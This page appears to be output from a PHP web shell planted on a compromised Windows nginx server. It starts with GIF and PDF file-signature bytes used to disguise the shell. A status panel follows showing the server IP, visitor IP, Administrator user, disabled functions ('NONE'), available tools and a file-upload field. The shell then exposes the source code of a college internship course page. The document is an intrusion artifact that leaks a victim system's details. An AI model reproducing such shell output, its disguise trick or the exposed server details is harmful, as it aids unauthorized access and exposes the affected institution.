GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2881/ |
Upload File : |
<? // JimMartinson/CST2881/InstructionalGuide.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); include('Course/courseInfo.phpinc'); include('classInfo.phpinc'); $title = "Instructional Guide"; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $js='openCenteredWindow'; include('common/pageHeader.phpinc'); include('Login/authenticate.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; include('common/sectionHeader.phpinc'); $week = 0; ?> <fieldset><legend>Basic Class Operation</legend> Unlike a standard class, an Internship is work performed in a job environment. The student works for a business. This is usually in an Internship position but it can also be a standard job position that the student wants to apply towards Internship credits. <br>The Internship is defined in the <a href="Resources/InternshipForms/Internship_Training_Program.pdf" target="_blank">Internship Training Program</a> document. Other docments are used to: <ul> <li>The <a href="./Resources/InternshipForms/.xps" target="_blank">Internship Training Plan</a> form is an outline of the basic requirements the student will fulfill in the position. This is filled out in concert with the <a href="Resources/InternshipForms/Internship_Training_Program.pdf" target="_blank">Internship Training Program</a> form. </li> <li>The <a href="Resources/InternshipForms/Internship Weekly Activity.xps" target="_blank">Internship Weekly Activity</a> form is used to document student work performed in the position. This document is filled out and turned in weekly by the student. </li> <li>The <a href="Resources/InternshipForms/Internship Supervisor Evaluation.xps" target="_blank">Internship Supervisor Evaluation</a> form is used to document the Internship Supervisor Evaluation. This document is filled out and turned in by the Internship Supervisor when the Internship hours are completed. </li> </ul> <span class="note">I plan to convert the above documents into pdf forms that can be distributed and filled out electronically similar to the <a href="./Resources/InternshipForms/.xps" target="_blank">Internship Training Plan</a>.</span> <br>The documents are turned in to the Internship Advisor before the end of the Semester. The Internship Advisor then used the documentation to determine a grade. </fieldset> <? include('ReferencesResources.phpinc'); include('JimMartinson/ContactInformation.phpinc'); include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>